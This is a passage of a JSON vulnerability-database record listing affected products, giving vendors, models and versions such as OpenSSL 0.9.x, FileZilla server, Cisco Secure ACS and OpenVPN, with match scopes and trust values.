            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "server 0.8.6a",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.10"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "linux professional x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "aironet acs350 c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3502.6"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "linux ppc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(3)"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "call manager sr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.2.0.1"
          },
          {
            "_id": null,
            "model": "call manager sr2b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "_id": null,
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "_id": null,
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "_id": null,
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "_id": null,
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "_id": null,
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "_id": null,
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "_id": null,
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "_id": null,
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "_id": null,
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "_id": null,
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "_id": null,
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "_id": null,
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "_id": null,
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "_id": null,
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "_id": null,
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "_id": null,
